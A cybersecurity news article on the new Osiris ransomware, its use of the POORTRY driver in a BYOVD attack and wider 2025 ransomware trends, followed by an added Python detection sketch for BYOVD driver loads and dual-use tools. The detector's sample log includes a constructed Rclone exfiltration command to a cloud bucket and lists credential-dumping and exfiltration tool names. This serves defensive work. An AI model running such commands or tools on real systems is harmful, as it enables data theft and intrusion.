Wednesday, February 11, 2026

New Osiris Ransomware Emerges as New Strain Utilizing POORTRY Driver in BYOVD Attack


Cybersecurity researchers have disclosed details of a new ransomware family called Osiris that targeted a major food service franchisee operator in Southeast Asia in November 2025.

The attack leveraged a malicious driver called POORTRY as part of a known technique called bring your own vulnerable driver (BYOVD) to disarm security software, the Symantec and Carbon Black Threat Hunter Team said.

It's worth noting that Osiris is assessed to be a brand-new ransomware strain, sharing no similarities with another variant of the same name that emerged in December 2016 as an iteration of the Locky ransomware. It's currently not known who the developers of the locker are, or whether it is marketed as a ransomware-as-a-service (RaaS).

However, the Broadcom-owned cybersecurity division said it identified clues that suggest the threat actors who deployed the ransomware may have been previously associated with INC ransomware (aka Warble).

“A number of living off the land and dual-use tools were used in this attack, as was a malicious POORTRY driver, which was likely used as part of a bring your own vulnerable driver (BYOVD) attack to disable security software,” the company said in a report shared with The Hacker News.

“The exfiltration of data by the attackers to Wasabi buckets, and the use of a version of Mimikatz that was previously used, with the same filename (kaz.exe), by attackers deploying the INC ransomware, point to potential links between this attack and some attacks involving INC.”

Described as an “effective encryption payload” that's likely wielded by experienced attackers, Osiris uses a hybrid encryption scheme and a unique encryption key for each file. It's also versatile in that it can stop services, specify which folders and extensions are to be encrypted, terminate processes, and drop a ransom note.


By default, it's designed to kill a long list of processes and services related to Microsoft Office, Exchange, Mozilla Firefox, WordPad, Notepad, Volume Shadow Copy, and Veeam, among others.

The first signs of malicious activity on the target's network involved the exfiltration of sensitive data using Rclone to a Wasabi cloud storage bucket prior to the ransomware deployment. Also used in the attack were various dual-use tools like Netscan, Netexec, and MeshAgent, as well as a custom version of the RustDesk remote desktop software.

POORTRY is somewhat different from traditional BYOVD attacks in that it uses a bespoke driver expressly designed for elevating privileges and terminating security tools, as opposed to deploying a legitimate-but-vulnerable driver to the target network.

“KillAV, which is a tool used to deploy vulnerable drivers for terminating security processes, was also deployed on the target's network,” the Symantec and Carbon Black Threat Hunter Team noted. “RDP was also enabled on the network, likely to provide the attackers with remote access.”

The development comes as ransomware remains a significant enterprise threat, with the landscape constantly shifting as some groups close their doors and others quickly rise from their ashes or move in to take their place. According to an analysis of data leak sites by Symantec and Carbon Black, ransomware actors claimed a total of 4,737 attacks during 2025, up from 4,701 in 2024, a 0.8% increase.

The most active players during the past year were Akira (aka Darter or Howling Scorpius), Qilin (aka Stinkbug or Water Galura), Play (aka Balloonfly), INC, SafePay, RansomHub (aka Greenbottle), DragonForce (aka Hackledorb), Sinobi, Rhysida, and CACTUS. Some of the other notable developments in the space are listed below:

  • Threat actors using the Akira ransomware have leveraged a vulnerable ThrottleStop driver, along with the Windows CardSpace User Interface Agent and Microsoft Media Foundation Protected Pipeline, to sideload the Bumblebee loader in attacks observed in mid-to-late 2025.
  • Akira ransomware campaigns have also exploited SonicWall SSL VPNs to breach small- to medium-sized business environments during mergers and acquisitions and ultimately gain access to the larger, acquiring enterprises. Another Akira attack has been found to leverage ClickFix-style CAPTCHA verification lures to drop a .NET remote access trojan called SectopRAT, which serves as a conduit for remote control and ransomware delivery.
  • LockBit (aka Syrphid), which partnered with DragonForce and Qilin in October 2025, has continued to maintain its infrastructure despite a law enforcement operation to shut down its operations in early 2024. It has also released variants of LockBit 5.0 targeting multiple operating systems and virtualization platforms. A significant update to LockBit 5.0 is the introduction of a two-stage ransomware deployment model that separates the loader from the main payload, while simultaneously maximizing evasion, modularity, and destructive impact.
  • A new RaaS operation dubbed Sicarii has claimed just one victim since it first surfaced in late 2025. While the group explicitly identifies itself as Israeli/Jewish, analysis has uncovered that its underground online activity is primarily carried out in Russian and that the Hebrew content shared by the threat actor contains grammatical and semantic errors. This has raised the possibility of a false flag operation. Sicarii's main operator uses the Telegram account “@Skibcum.”
  • The threat actor known as Storm-2603 (aka CL-CRI-1040 or Gold Salem) has been observed leveraging the legitimate Velociraptor digital forensics and incident response (DFIR) tool as part of precursor activity leading to the deployment of Warlock, LockBit, and Babuk ransomware. The attacks have also utilized two drivers (“rsndispot.sys” and “kl.sys”) along with “vmtools.exe” to disable security solutions using a BYOVD attack.
  • Entities in India, Brazil, and Germany have been targeted by Makop ransomware attacks that exploit exposed and insecure RDP systems to stage tools for network scanning, privilege escalation, disabling security software, credential dumping, and ransomware deployment. The attacks, besides using “hlpdrv.sys” and “ThrottleStop.sys” drivers for BYOVD attacks, also deploy GuLoader to deliver the ransomware payload. This is the first documented case of Makop being distributed via a loader.
  • Ransomware attacks have also obtained initial access using already-compromised RDP credentials to perform reconnaissance, privilege escalation, and lateral movement via RDP, followed by exfiltrating data to temp[.]sh on day six of the intrusion and deploying Lynx ransomware three days later.
  • A security flaw in the encryption process associated with the Obscura ransomware has been found to render large files unrecoverable. “When it encrypts large files, it fails to write the encrypted temporary key to the file's footer,” Coveware said. “For files over 1GB, that footer is never created at all — which means the key needed for decryption is lost. These files are permanently unrecoverable.”
  • A new ransomware family named 01flip has targeted a limited set of victims in the Asia-Pacific region. Written in Rust, the ransomware can target both Windows and Linux systems. Attack chains involve the exploitation of known security vulnerabilities (e.g., CVE-2019-11580) to obtain a foothold into target networks. It has been attributed to a financially motivated threat actor known as CL-CRI-1036.

To protect against targeted attacks, organizations are advised to monitor the use of dual-use tools, restrict access to RDP services, implement two-factor authentication (2FA), use application allowlisting where applicable, and implement off-site storage of backup copies.

“While attacks involving encrypting ransomware remain as prevalent as ever and still pose a threat, the advent of new types of encryptionless attacks adds another degree of risk, creating a wider extortion ecosystem of which ransomware may become just one component,” Symantec and Carbon Black said.
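Two of the recurring themes above are kernel drivers loaded for BYOVD (ThrottleStop.sys, hlpdrv.sys, rsndispot.sys, kl.sys) and the dual-use tooling (Rclone to a Wasabi bucket, Netscan, Netexec, MeshAgent, RustDesk, the kaz.exe Mimikatz build, KillAV) that the mitigation advice says to monitor. The following is an added detection sketch, not code from the Symantec and Carbon Black report: it walks a handful of constructed, Sysmon-style key=value log lines (Event ID 6 driver loads and Event ID 1 process creations, an assumed format) and raises alerts for known BYOVD driver names, for any driver loaded from outside the Windows driver directories, for the dual-use binaries, and for Rclone commands that push data to a named cloud remote. The binary names in DUAL_USE_BINARIES are assumptions, since the page names the tools but not their file names on disk.

```python
"""Detection sketch for BYOVD driver loads and dual-use tool activity.

Added example; the log format (Sysmon-like key=value lines) and the
sample events are constructed for illustration.
"""
import re
from typing import NamedTuple

DRIVER_LOAD = "6"      # Sysmon Event ID 6: driver loaded
PROCESS_CREATE = "1"   # Sysmon Event ID 1: process created

# Driver file names the page reports in BYOVD attacks (Akira, Storm-2603, Makop).
BYOVD_DRIVER_NAMES = {"throttlestop.sys", "hlpdrv.sys", "rsndispot.sys", "kl.sys"}

# Assumed on-disk names for the dual-use tools named on the page; kaz.exe is
# the Mimikatz filename the report ties to INC-linked attackers.
DUAL_USE_BINARIES = {
    "rclone.exe", "netscan.exe", "netexec.exe", "meshagent.exe",
    "rustdesk.exe", "kaz.exe", "killav.exe",
}

# Directories a kernel driver is normally loaded from; anything else is suspect.
TRUSTED_DRIVER_DIRS = (
    "c:\\windows\\system32\\drivers\\",
    "c:\\windows\\system32\\driverstore\\",
)

# key=value pairs; quoted values may contain spaces.
_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Rclone "copy/sync/move <src> <remote>:<path>"; a remote name needs at least
# two characters before the colon, so a local drive letter (D:\...) is ignored.
_RCLONE_REMOTE = re.compile(r"\b(copy|sync|move)\b.*?(?<!\S)[A-Za-z][\w-]+:")


class Alert(NamedTuple):
    rule: str
    detail: str


def parse_event(line: str) -> dict:
    """Parse one key=value log line into a dict of string fields."""
    return {key: (quoted or bare) for key, quoted, bare in _KV.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_driver_load(ev: dict) -> list:
    image = ev.get("ImageLoaded", "")
    name = basename(image)
    alerts = []
    if name in BYOVD_DRIVER_NAMES:
        alerts.append(Alert("byovd-known-driver", f"{name} loaded from {image}"))
    if not image.lower().startswith(TRUSTED_DRIVER_DIRS):
        alerts.append(Alert("driver-outside-system-dirs", image))
    return alerts


def check_process_create(ev: dict) -> list:
    name = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    alerts = []
    if name in DUAL_USE_BINARIES:
        alerts.append(Alert("dual-use-tool", f"{name}: {cmd}"))
    if name == "rclone.exe" and _RCLONE_REMOTE.search(cmd):
        alerts.append(Alert("rclone-cloud-exfil", cmd))
    return alerts


def analyze(lines) -> list:
    """Run the driver-load and process-creation rules over an iterable of log lines."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        event_id = ev.get("EventID")
        if event_id == DRIVER_LOAD:
            alerts.extend(check_driver_load(ev))
        elif event_id == PROCESS_CREATE:
            alerts.extend(check_process_create(ev))
    return alerts


# Constructed sample events: one benign process, one benign driver, and
# activity shaped like the page's Rclone exfiltration, kaz.exe and BYOVD steps.
SAMPLE_LOG = [
    'EventID=1 Image="C:\\Windows\\System32\\svchost.exe" CommandLine="svchost.exe -k netsvcs"',
    'EventID=1 Image="C:\\ProgramData\\rclone.exe" CommandLine="rclone copy D:\\Finance wasabi:exfil-bucket --transfers 16"',
    'EventID=1 Image="C:\\Users\\Public\\kaz.exe" CommandLine="kaz.exe"',
    'EventID=6 ImageLoaded="C:\\Windows\\System32\\drivers\\tcpip.sys" Signed=true',
    'EventID=6 ImageLoaded="C:\\Windows\\Temp\\ThrottleStop.sys" Signed=true',
    'EventID=6 ImageLoaded="C:\\Users\\Public\\kl.sys" Signed=false',
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(f"[{alert.rule}] {alert.detail}")
```

The "driver loaded outside the system driver directories" rule is the one that would also catch a bespoke driver such as POORTRY, which no name list covers; the known-name list is cheap but only catches what has already been reported. In production the same rules belong in the SIEM's query language, fed by real Sysmon or EDR telemetry rather than the constructed lines above.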
